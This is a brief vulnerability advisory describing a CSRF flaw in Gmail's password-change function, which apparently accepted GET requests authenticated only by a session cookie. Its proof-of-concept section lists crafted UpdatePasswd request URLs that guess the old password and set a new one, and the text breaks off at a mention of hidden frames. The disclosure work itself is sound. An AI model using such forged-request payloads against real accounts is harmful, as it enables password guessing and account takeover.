Your Ad Here

Summary

Gmail is Google's "free webmail service. It comes with built-in Google search technology and over 2,600 megabytes of storage (and growing every day). You can keep all your important messages, files and pictures forever, use search to quickly and easily find anything you're looking for, and make sense of it all with a new way of viewing messages as part of conversations".

Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while cross-site request forgery merely transmits unauthorized commands from a user the website trusts.

GMail is vulnerable to CSRF attacks in the "Change Password" functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.

An attacker can create a page that includes requests to the "Change password" functionality of GMail and modify the passwords of the users who, being authenticated, visit the page of the attacker.

The attack is facilitated since the "Change Password" request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the "Change Password" form.

DETAILS

Proof of concept:
1. An attacker create a web page "csrf-attack.html" that realize many HTTP GET requests to the "Change Password" functionality.

For example, a password cracking of 3 attempts (see "OldPasswd" parameter):
...
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD1&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD2&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
src="https://www.google.com/accounts/UpdatePasswd?service=mail&hl=en&group1=OldPasswd& OldPasswd=PASSWORD3&Passwd=abc123&PasswdAgain=abc123&p=&save=Save">
...

or with hidden frames:
...